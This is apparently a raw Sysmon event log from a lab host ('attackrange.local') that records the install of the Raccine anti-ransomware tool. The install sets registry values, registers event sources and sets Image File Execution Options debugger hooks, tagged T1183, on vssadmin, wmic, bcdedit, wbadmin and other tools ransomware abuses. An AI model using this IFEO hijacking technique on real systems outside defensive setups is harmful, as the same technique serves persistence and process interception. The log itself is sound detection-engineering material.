154100x80000000000000001897235Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:29.010{9DBE88B5-1135-61B1-7CFF-000000000E02}5100C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeREG.EXE ADD HKLM\Software\Raccine /v ScanMemory /t REG_DWORD /d 1 /FC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001897227Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.998{9DBE88B5-1134-61B1-7BFF-000000000E02}6072C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeREG.EXE ADD HKLM\Software\Raccine /v ShowGui /t REG_DWORD /d 1 /FC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001897218Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.978{9DBE88B5-1134-61B1-7AFF-000000000E02}4760C:\Windows\System32\eventcreate.exe10.0.14393.0 (rs1_release.160715-1616)Event Create - Creates a custom event in an event logMicrosoft® Windows® Operating SystemMicrosoft Corporationevcreate.exeeventcreate.exe /L Application /T Information /id 3 /so Raccine /d "Raccine Setup: Registration of Event ID 3 - Used for Benign Activity" C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=1EDA7FDF4B09E1582A7DAC5FEFFE0894,SHA256=AD90D99135B3E443F3DEEA5B40199CE5B83CCB0964FD9AC3F11B9224766ED7BA,IMPHASH=90AD596C15F07AE1924E9B5BDD280178{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001897207Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.959{9DBE88B5-1134-61B1-79FF-000000000E02}3616C:\Windows\System32\eventcreate.exe10.0.14393.0 (rs1_release.160715-1616)Event Create - Creates a custom event in an event logMicrosoft® Windows® Operating SystemMicrosoft Corporationevcreate.exeeventcreate.exe /L Application /T Information /id 2 /so Raccine /d "Raccine Setup: Registration of Event ID 2 - Used for Malicious Actitivty" C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=1EDA7FDF4B09E1582A7DAC5FEFFE0894,SHA256=AD90D99135B3E443F3DEEA5B40199CE5B83CCB0964FD9AC3F11B9224766ED7BA,IMPHASH=90AD596C15F07AE1924E9B5BDD280178{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 13241300x80000000000000001897205Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-SetValue2021-12-08 20:10:28.691{9DBE88B5-1134-61B1-78FF-000000000E02}6748C:\Windows\system32\eventcreate.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\Raccine\CustomSourceDWORD (0x00000001) 13241300x80000000000000001897204Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-SetValue2021-12-08 20:10:28.691{9DBE88B5-1134-61B1-78FF-000000000E02}6748C:\Windows\system32\eventcreate.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\Raccine\TypesSupportedDWORD (0x00000007) 13241300x80000000000000001897203Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-SetValue2021-12-08 20:10:28.691{9DBE88B5-1134-61B1-78FF-000000000E02}6748C:\Windows\system32\eventcreate.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\Raccine\EventMessageFile%%SystemRoot%%\System32\EventCreate.exe 154100x80000000000000001897195Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.676{9DBE88B5-1134-61B1-78FF-000000000E02}6748C:\Windows\System32\eventcreate.exe10.0.14393.0 (rs1_release.160715-1616)Event Create - Creates a custom event in an event logMicrosoft® Windows® Operating SystemMicrosoft Corporationevcreate.exeeventcreate.exe /L Application /T Information /id 1 /so Raccine /d "Raccine Setup: Registration of Event ID 1 - Used for Informational Messages" C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=1EDA7FDF4B09E1582A7DAC5FEFFE0894,SHA256=AD90D99135B3E443F3DEEA5B40199CE5B83CCB0964FD9AC3F11B9224766ED7BA,IMPHASH=90AD596C15F07AE1924E9B5BDD280178{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001897187Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.661{9DBE88B5-1134-61B1-77FF-000000000E02}1088C:\Windows\System32\icacls.exe10.0.14393.0 (rs1_release.160715-1616)-Microsoft® Windows® Operating SystemMicrosoft CorporationiCACLS.EXEicacls "C:\ProgramData\Raccine\Raccine_log.txt" /grant Users:FC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=0F7E1625009A0C00A9D9809694FC5831,SHA256=0CA4AFF87EED104E2277C0E38B292CD32950DAD6A233C791F798EA75AE28DEEC,IMPHASH=03499A3871CAFF2E334ECA403D23FE9A{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 11241100x80000000000000001897186Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.644{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\system32\cmd.exeC:\ProgramData\Raccine\Raccine_log.txt2021-12-08 20:10:28.644 154100x80000000000000001897177Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.420{9DBE88B5-1134-61B1-76FF-000000000E02}7144C:\Windows\System32\setx.exe10.0.14393.0 (rs1_release.160715-1616)Setx - Sets environment variablesMicrosoft® Windows® Operating SystemMicrosoft Corporationsetx.exeSETX /M Path "C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Amazon\cfn-bootstrap\;C:\ProgramData\chocolatey\bin;C:\Program Files\Git\cmd;c:\Program Files\ansible\sysmon;C:\Users\Administrator\AppData\Local\Microsoft\WindowsApps;;C:\Program Files\Raccine"C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=A42B2D2E42D7DE56C4FF55F4B67AC948,SHA256=266F8D4CD89A7881B3D70035A76B6F79E4E57FD9AA5B0869C0C3A132297CE58A,IMPHASH=27DA151D5DF1FD02EA47C6A90C2A404B{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 11241100x80000000000000001897176Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localEXE2021-12-08 20:10:28.376{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\system32\cmd.exeC:\Program Files\Raccine\yarac64.exe2021-12-08 20:10:28.376 11241100x80000000000000001897174Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localEXE2021-12-08 20:10:28.344{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\system32\cmd.exeC:\Program Files\Raccine\yara64.exe2021-12-08 20:10:28.344 11241100x80000000000000001897173Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localEXE2021-12-08 20:10:28.344{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\system32\cmd.exeC:\Program Files\Raccine\Raccine.exe2021-12-08 20:10:28.344 11241100x80000000000000001897172Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localEXE2021-12-08 20:10:28.344{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\system32\cmd.exeC:\Program Files\Raccine\RaccineRulesSync.exe2021-12-08 20:10:28.344 11241100x80000000000000001897171Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localEXE2021-12-08 20:10:28.342{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\system32\cmd.exeC:\Program Files\Raccine\RaccineSettings.exe2021-12-08 20:10:28.342 11241100x80000000000000001897170Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localEXE2021-12-08 20:10:28.338{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\system32\cmd.exeC:\Program Files\Raccine\RaccineElevatedCfg.exe2021-12-08 20:10:28.338 154100x80000000000000001897162Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.329{9DBE88B5-1134-61B1-75FF-000000000E02}1092C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeREG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v4.0.30319\SKUs\.NETFramework,Version=v4.5" C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001897154Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.315{9DBE88B5-1134-61B1-74FF-000000000E02}5016C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeREG.EXE ADD HKLM\Software\Raccine /v LogOnly /t REG_DWORD /d 1 /FC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 13241300x80000000000000001897153Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT1183,IFEOSetValue2021-12-08 20:10:28.307{9DBE88B5-1134-61B1-73FF-000000000E02}3064C:\Windows\regedit.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\DebuggerC:\Program Files\Raccine\Raccine.exe 154100x80000000000000001897146Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.291{9DBE88B5-1134-61B1-73FF-000000000E02}3064C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXEREGEDIT.EXE /S reg-patches\raccine-reg-patch-taskkill.regC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 13241300x80000000000000001897145Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT1183,IFEOSetValue2021-12-08 20:10:28.276{9DBE88B5-1134-61B1-72FF-000000000E02}6552C:\Windows\regedit.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exe\DebuggerC:\Program Files\Raccine\Raccine.exe 154100x80000000000000001897137Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.267{9DBE88B5-1134-61B1-72FF-000000000E02}6552C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXEREGEDIT.EXE /S reg-patches\raccine-reg-patch-net.regC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 13241300x80000000000000001897136Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT1183,IFEOSetValue2021-12-08 20:10:28.260{9DBE88B5-1134-61B1-71FF-000000000E02}5832C:\Windows\regedit.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exe\DebuggerC:\Program Files\Raccine\Raccine.exe 154100x80000000000000001897129Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.245{9DBE88B5-1134-61B1-71FF-000000000E02}5832C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXEREGEDIT.EXE /S reg-patches\raccine-reg-patch-diskshadow.regC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 13241300x80000000000000001897128Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT1183,IFEOSetValue2021-12-08 20:10:28.239{9DBE88B5-1134-61B1-70FF-000000000E02}2772C:\Windows\regedit.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\DebuggerC:\Program Files\Raccine\Raccine.exe 154100x80000000000000001897121Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.220{9DBE88B5-1134-61B1-70FF-000000000E02}2772C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXEREGEDIT.EXE /S reg-patches\raccine-reg-patch-powershell.regC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 13241300x80000000000000001897120Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT1183,IFEOSetValue2021-12-08 20:10:28.207{9DBE88B5-1134-61B1-6FFF-000000000E02}5108C:\Windows\regedit.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exe\DebuggerC:\Program Files\Raccine\Raccine.exe 154100x80000000000000001897113Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.198{9DBE88B5-1134-61B1-6FFF-000000000E02}5108C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXEREGEDIT.EXE /S reg-patches\raccine-reg-patch-bcdedit.regC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 13241300x80000000000000001897112Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT1183,IFEOSetValue2021-12-08 20:10:28.192{9DBE88B5-1134-61B1-6EFF-000000000E02}3520C:\Windows\regedit.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exe\DebuggerC:\Program Files\Raccine\Raccine.exe 154100x80000000000000001897105Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.174{9DBE88B5-1134-61B1-6EFF-000000000E02}3520C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXEREGEDIT.EXE /S reg-patches\raccine-reg-patch-wbadmin.regC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 13241300x80000000000000001897104Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT1183,IFEOSetValue2021-12-08 20:10:28.160{9DBE88B5-1134-61B1-6DFF-000000000E02}4988C:\Windows\regedit.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe\DebuggerC:\Program Files\Raccine\Raccine.exe 154100x80000000000000001897096Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.150{9DBE88B5-1134-61B1-6DFF-000000000E02}4988C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXEREGEDIT.EXE /S reg-patches\raccine-reg-patch-wmic.reg C:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 13241300x80000000000000001897095Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.localT1183,IFEOSetValue2021-12-08 20:10:28.142{9DBE88B5-1134-61B1-6CFF-000000000E02}2732C:\Windows\regedit.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exe\DebuggerC:\Program Files\Raccine\Raccine.exe 154100x80000000000000001897088Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.111{9DBE88B5-1134-61B1-6CFF-000000000E02}2732C:\Windows\regedit.exe10.0.14393.953 (rs1_release_inmarket.170303-1614)Registry EditorMicrosoft® Windows® Operating SystemMicrosoft CorporationREGEDIT.EXEREGEDIT.EXE /S reg-patches\raccine-reg-patch-vssadmin.regC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=BF5D30514FEA913E25CCC9E546257088,SHA256=254B18A8CC6589AF666EE17CE4E76C67350AECF578206CC7678745ED47A32D63,IMPHASH=E6DBB62DC548A099806914C678466448{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001897077Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.077{9DBE88B5-1134-61B1-6BFF-000000000E02}2832C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeSCHTASKS /DELETE /TN "Raccine Rules Updater" /FC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001897069Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:28.063{9DBE88B5-1134-61B1-6AFF-000000000E02}6016C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exeREG DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /FC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001896988Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:27.995{9DBE88B5-1133-61B1-69FF-000000000E02}4200C:\Windows\System32\taskkill.exe10.0.14393.0 (rs1_release.160715-1616)Terminates ProcessesMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskkill.exeTASKKILL /F /IM RaccineRulesSync.exeC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=8C066C766F5CD84CBC47E14712C54FD0,SHA256=0EA8C0267A76B543302C4258B78BC477AA8876767B7A526549CCE34EEF6D859F,IMPHASH=5F3868B59CD541824A308E7BB7B9CAC3{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001896908Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:27.930{9DBE88B5-1133-61B1-68FF-000000000E02}3908C:\Windows\System32\taskkill.exe10.0.14393.0 (rs1_release.160715-1616)Terminates ProcessesMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskkill.exeTASKKILL /F /IM RaccineSettings.exeC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=8C066C766F5CD84CBC47E14712C54FD0,SHA256=0EA8C0267A76B543302C4258B78BC477AA8876767B7A526549CCE34EEF6D859F,IMPHASH=5F3868B59CD541824A308E7BB7B9CAC3{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001896828Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:27.862{9DBE88B5-1133-61B1-67FF-000000000E02}4496C:\Windows\System32\taskkill.exe10.0.14393.0 (rs1_release.160715-1616)Terminates ProcessesMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskkill.exeTASKKILL /F /IM RaccineRulesSync.exeC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=8C066C766F5CD84CBC47E14712C54FD0,SHA256=0EA8C0267A76B543302C4258B78BC477AA8876767B7A526549CCE34EEF6D859F,IMPHASH=5F3868B59CD541824A308E7BB7B9CAC3{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001896748Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:27.795{9DBE88B5-1133-61B1-66FF-000000000E02}5188C:\Windows\System32\taskkill.exe10.0.14393.0 (rs1_release.160715-1616)Terminates ProcessesMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskkill.exeTASKKILL /F /IM RaccineSettings.exeC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=8C066C766F5CD84CBC47E14712C54FD0,SHA256=0EA8C0267A76B543302C4258B78BC477AA8876767B7A526549CCE34EEF6D859F,IMPHASH=5F3868B59CD541824A308E7BB7B9CAC3{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Downloads\Raccine\Raccine\install-raccine.bat" " 154100x80000000000000001896659Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-08 20:10:27.667{9DBE88B5-1133-61B1-64FF-000000000E02}4480C:\Windows\System32\taskkill.exe10.0.14393.0 (rs1_release.160715-1616)Terminates ProcessesMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskkill.exeTASKKILL /F /IM Raccine.exeC:\Users\Administrator\Downloads\Raccine\Raccine\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=8C066C766F5CD84CBC47E14712C54FD0,SHA256=0EA8C0267A76B543302C4258B78BC477AA8876767B7A526549CCE34EEF6D859F,IMPHASH=5F3868B59CD541824A308E7BB7B9CAC3{9DBE88B5-1126-61B1-57FF-000000000E02}3172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c 